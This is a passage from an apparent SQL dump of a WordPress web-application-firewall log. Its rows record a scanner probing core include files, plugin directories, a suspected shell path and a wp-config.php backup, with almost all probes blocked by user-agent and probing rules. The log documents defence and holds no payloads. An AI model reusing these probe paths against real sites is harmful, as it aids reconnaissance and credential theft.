User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWN1c3RvbWl6ZS1zZWN0aW9uLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133146,1699888495.579918,1699888495.564300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-customize-panel.php','http://eckankar-colorado.org/wp-includes/class-wp-customize-panel.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWN1c3RvbWl6ZS1wYW5lbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133210,1699888692.396277,1699888692.382800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/up/.well-known/','http://eckankar-colorado.org/up/.well-known/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwLy53ZWxsLWtub3duLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133574,1699888549.450375,1699888549.441700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api.php','http://eckankar-colorado.org/wp-includes/rest-api.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133575,1699888549.118222,1699888549.108900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/registration.php','http://eckankar-colorado.org/wp-includes/registration.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3JlZ2lzdHJhdGlvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133577,1699888548.390716,1699888548.382100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/query.php','http://eckankar-colorado.org/wp-includes/query.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3F1ZXJ5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133576,1699888548.767468,1699888548.758800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/registration-functions.php','http://eckankar-colorado.org/wp-includes/registration-functions.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3JlZ2lzdHJhdGlvbi1mdW5jdGlvbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133578,1699888548.051969,1699888548.042800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/post.php','http://eckankar-colorado.org/wp-includes/post.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Bvc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133579,1699888547.701133,1699888547.691800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/post-thumbnail-template.php','http://eckankar-colorado.org/wp-includes/post-thumbnail-template.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Bvc3QtdGh1bWJuYWlsLXRlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133200,1699888476.066608,1699888476.057900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/author-template.php','http://eckankar-colorado.org/wp-includes/author-template.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2F1dGhvci10ZW1wbGF0ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133201,1699888475.731301,1699888475.722400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/atomlib.php','http://eckankar-colorado.org/wp-includes/atomlib.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2F0b21saWIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133351,1699888635.874139,1699888635.852200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/comment.php','http://eckankar-colorado.org/wp-admin/includes/comment.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NvbW1lbnQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133237,1699888681.990077,1699888681.981300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/cakil/','http://eckankar-colorado.org/wp-content/plugins/cakil/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYWtpbC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133333,1699888642.028017,1699888642.019200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/ms.php','http://eckankar-colorado.org/wp-admin/includes/ms.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133072,1699788204.357762,1699788204.354100,0x00000000000000000000FFFF92BE7918,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.php.inc',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy5waHAuaW5j\",\"path\":\"L3dwLWNvbmZpZy5waHAuaW5j\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(133065,1699787358.961948,1699787358.951600,0x00000000000000000000FFFFC2A9AF1F,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/js/500.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2pzLzUwMC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133064,1699787361.273381,1699787361.264200,0x00000000000000000000FFFFC2A9AF1F,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/themes.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3RoZW1lcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133604,1699888538.264107,1699888538.255400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/l10n.php','http://eckankar-colorado.org/wp-includes/l10n.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2wxMG4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133608,1699888536.778148,1699888536.767900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/http.php','http://eckankar-colorado.org/wp-includes/http.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0dHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133606,1699888537.475178,1699888537.460000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/https-migration.php','http://eckankar-colorado.org/wp-includes/https-migration.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0dHBzLW1pZ3JhdGlvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133607,1699888537.129457,1699888537.120800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/https-detection.php','http://eckankar-colorado.org/wp-includes/https-detection.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0dHBzLWRldGVjdGlvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133605,1699888537.907517,1699888537.898900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/kses.php','http://eckankar-colorado.org/wp-includes/kses.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2tzZXMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134680,1700171709.591982,1700171709.580400,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts/class-wp-font-face.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL2NsYXNzLXdwLWZvbnQtZmFjZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134671,1700170076.128834,1700170076.106500,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133251,1699888676.966549,1699888676.957200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php','http://eckankar-colorado.org/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL3Byb3ZpZGVycy9jbGFzcy13cC1zaXRlbWFwcy1wb3N0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133240,1699888680.987171,1699888680.978500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/aryabot/','http://eckankar-colorado.org/wp-content/plugins/aryabot/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcnlhYm90Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133241,1699888680.657993,1699888680.648700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/linkpreview/','http://eckankar-colorado.org/wp-content/plugins/linkpreview/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9saW5rcHJldmlldy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133397,1699888619.893861,1699888619.884900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-plugin-upgrader.php','http://eckankar-colorado.org/wp-admin/includes/class-plugin-upgrader.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A 